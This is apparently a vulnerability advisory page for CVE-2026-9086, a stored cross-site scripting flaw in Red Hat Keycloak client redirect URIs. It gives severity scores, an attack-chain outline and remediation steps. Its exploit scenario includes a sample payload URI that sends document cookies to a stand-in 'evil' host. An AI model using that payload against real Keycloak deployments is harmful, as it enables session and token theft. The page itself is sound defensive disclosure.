Skip to main content

Red Hat Keycloak EUVDEUVD-2026-39473

| CVE-2026-9086 HIGH
Cross-site Scripting (XSS) (CWE-79)
2026-06-25 redhat GHSA-37j9-56gh-j2r7
7.3
CVSS 3.1 · Vendor: redhat
Share

Severity by source

Vendor (redhat) PRIMARY
7.3 HIGH
AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
vuln.today AI
8.7 HIGH

Network XSS needs prior client-management privilege (PR:L) and a victim click (UI:R); script runs in the Keycloak origin affecting other sessions, so I assess S:C with high confidentiality/integrity impact and no availability effect.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
Red Hat
7.3 HIGH
qualitative

Primary rating from Vendor (redhat).

CVSS VectorVendor: redhat

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

1
Analysis Generated
Jun 25, 2026 - 17:19 vuln.today

DescriptionCVE.org

A flaw was found in Keycloak. A remote attacker with administrative privileges, specifically those with manage-client permission or access to client registration endpoints, could bypass client Uniform Resource Identifier (URI) validation. This is achieved by registering a malicious client with a specially crafted redirect URI using a case-insensitive javascript: or data: scheme. This Cross-Site Scripting (XSS) vulnerability allows for arbitrary code execution in the Keycloak origin when a victim clicks the crafted link, such as in the logout flow or the Admin Console.

AnalysisAI

Stored Cross-Site Scripting in Red Hat Build of Keycloak lets an authenticated administrator with manage-client permission (or access to client registration endpoints) register a malicious client whose redirect URI uses a case-insensitive javascript: or data: scheme, bypassing URI validation. When a victim later clicks a crafted link - for example during the logout flow or within the Admin Console - the script executes in the Keycloak origin, enabling session/token theft and effective code execution in that trusted context. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain manage-client or registration access
Delivery
Register client with case-mangled javascript:/data: redirect URI
Exploit
Bypass URI scheme validation
Execution
Deliver crafted logout/Admin Console link to victim
Persist
Victim click triggers XSS in Keycloak origin
Impact
Exfiltrate session tokens / execute actions as victim

Vulnerability AssessmentAI

Exploitation Exploitation requires an attacker who already holds administrative-level access to client management - specifically the `manage-client` permission or reachable client registration endpoints - to register or modify a client with a crafted redirect URI using a case-insensitive `javascript:` or `data:` scheme. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Signals are moderately concordant rather than alarming. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An administrator (or attacker who has compromised an account holding `manage-client` permission) registers a new OIDC client and sets a redirect URI such as `JavaScript:fetch('//evil/'+document.cookie)`, which evades the case-sensitive scheme filter. The attacker then lures a logged-in Keycloak admin or user into clicking a logout or Admin Console link tied to that client; the script runs in the Keycloak origin and exfiltrates the victim's session token, granting the attacker control of that session. …
Remediation No vendor-released patch version is identified in the provided data, so confirm and apply the fixed Red Hat Build of Keycloak release referenced in the Red Hat advisory (https://access.redhat.com/security/cve/CVE-2026-9086) and Bugzilla 2480170 (https://bugzilla.redhat.com/show_bug.cgi?id=2480170) as soon as it is published - these are the authoritative sources for the exact version. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Audit all Keycloak client registrations (especially recent additions) for suspicious redirect URIs containing javascript: or data: schemes; review administrative access logs for client registration activities. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2026-9800 HIGH
8.1 Jun 25

Authorization bypass in the Keycloak Policy Enforcer allows any authenticated user to circumvent all enforced access con

CVE-2026-11800 HIGH
8.1 Jun 25

Signature-verification bypass in Keycloak (and Red Hat's Keycloak-based products such as Red Hat Single Sign-On 7 and Re

CVE-2026-7504 HIGH
8.1 May 19

Open redirect in Red Hat build of Keycloak permits remote attackers to send victims to attacker-controlled hosts by abus

CVE-2026-9087 HIGH
8.1 May 20

Identity linking bypass in Red Hat build of Keycloak allows an attacker controlling a second account on the same upstrea

CVE-2026-4636 HIGH
8.1 Apr 02

Authenticated users with uma_protection role in Red Hat Keycloak can bypass User-Managed Access policy validation to gai

CVE-2026-9099 HIGH
7.7 Jun 25

Privilege escalation in Keycloak (Red Hat Build of Keycloak) lets an authenticated delegated admin with management right

CVE-2026-7307 HIGH
7.5 May 19

Denial of service in Red Hat build of Keycloak allows remote unauthenticated attackers to exhaust CPU and worker threads

CVE-2026-4634 HIGH
7.5 Apr 02

Denial of Service in Red Hat Build of Keycloak allows unauthenticated remote attackers to exhaust server resources by su

CVE-2026-7507 HIGH
7.5 May 19

Session fixation in Keycloak's login-actions endpoints allows remote attackers to hijack authenticated sessions and take

CVE-2026-4282 HIGH
7.4 Apr 02

Authorization code forgery in Red Hat Keycloak enables unauthenticated attackers to escalate privileges to admin-level a

CVE-2026-3872 HIGH
7.3 Apr 02

Open redirect in Red Hat Build of Keycloak allows authenticated attackers with control over another path on the same web

CVE-2026-9795 HIGH
7.3 May 28

Privilege escalation in Keycloak's Fine-Grained Admin Permissions v2 (FGAPv2) allows an administrator with only limited

Vendor StatusVendor

Share

EUVD-2026-39473 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy